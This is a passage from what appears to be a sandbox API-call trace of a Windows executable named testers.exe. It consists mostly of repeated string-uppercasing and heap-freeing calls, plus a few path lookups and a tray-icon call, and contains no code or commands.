lpszShortPath=0x86f70c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0251.465] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x86f70c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0251.466] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x86f70c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0251.466] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x86f70c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0251.466] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0251.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f270 | out: hHeap=0xc60000) returned 1 [0251.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca17e8 | out: hHeap=0xc60000) returned 1 [0251.467] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0251.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e0f0 | out: hHeap=0xc60000) returned 1 [0251.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18e8 | out: hHeap=0xc60000) returned 1 [0251.468] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0251.502] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.502] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.503] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0251.505] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.505] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.505] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1988 | out: hHeap=0xc60000) returned 1 [0251.506] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.506] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.506] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0251.509] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.509] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.509] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1948 | out: hHeap=0xc60000) returned 1 [0251.512] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.512] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.512] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1968 | out: hHeap=0xc60000) returned 1 [0251.514] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.514] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.515] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0251.516] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.516] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.516] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0251.520] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.520] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.520] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0251.523] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.523] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.523] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0251.525] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.525] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.525] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1988 | out: hHeap=0xc60000) returned 1 [0251.529] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.529] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.529] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0251.533] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.533] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.533] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1948 | out: hHeap=0xc60000) returned 1 [0251.540] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.540] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1968 | out: hHeap=0xc60000) returned 1 [0251.546] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.546] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0251.570] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.570] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.570] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0251.578] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.579] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.579] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0251.586] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.586] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.586] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0251.589] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.589] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.589] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1988 | out: hHeap=0xc60000) returned 1 [0251.591] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.591] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0251.597] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.597] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1948 | out: hHeap=0xc60000) returned 1 [0251.599] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.601] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1968 | out: hHeap=0xc60000) returned 1 [0251.609] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.610] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.610] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0251.617] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.617] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.617] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0251.632] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.632] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.632] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0251.641] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.641] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0251.648] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.649] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.649] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1988 | out: hHeap=0xc60000) returned 1 [0251.666] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.666] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0251.674] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.674] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1948 | out: hHeap=0xc60000) returned 1 [0251.693] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.693] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1968 | out: hHeap=0xc60000) returned 1 [0251.698] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.698] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.698] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0251.711] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.711] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.711] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18f8 | out: hHeap=0xc60000) returned 1 [0251.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.720] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.720] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18c8 | out: hHeap=0xc60000) returned 1 [0251.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca18d8 | out: hHeap=0xc60000) returned 1 [0251.741] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1988 | out: hHeap=0xc60000) returned 1 [0251.801] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.801] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.801] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0251.808] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0251.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1948 | out: hHeap=0xc60000) returned 1 [0251.818] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0251.833] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.893] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.895] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.898] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.899] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.901] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.902] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.904] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.907] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.909] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0251.910] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.013] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.015] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.017] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.019] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.020] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.022] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.023] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.025] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.028] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.029] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.030] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.032] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.033] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.035] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.036] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.037] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.049] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.051] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.052] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.054] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.056] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.057] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.058] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.059] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.063] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.065] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.067] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.069] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.069] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.071] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.072] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.074] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.076] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.077] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.078] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.080] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.082] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.083] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.085] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.087] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.088] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.090] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.092] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.094] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.097] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.098] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.100] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.102] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.103] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.105] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.109] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.110] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.112] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.117] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.119] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.120] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.122] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.122] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.124] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.126] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.128] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.130] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.133] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.134] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.136] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.138] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.140] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.142] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.144] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.145] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.147] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.149] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.151] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.153] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.156] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.157] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.160] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.161] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.162] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ed00) returned 1 [0252.163] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.164] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.166] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.170] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.171] CharUpperBuffW (in: lpsz="_BYTESTOBITS", 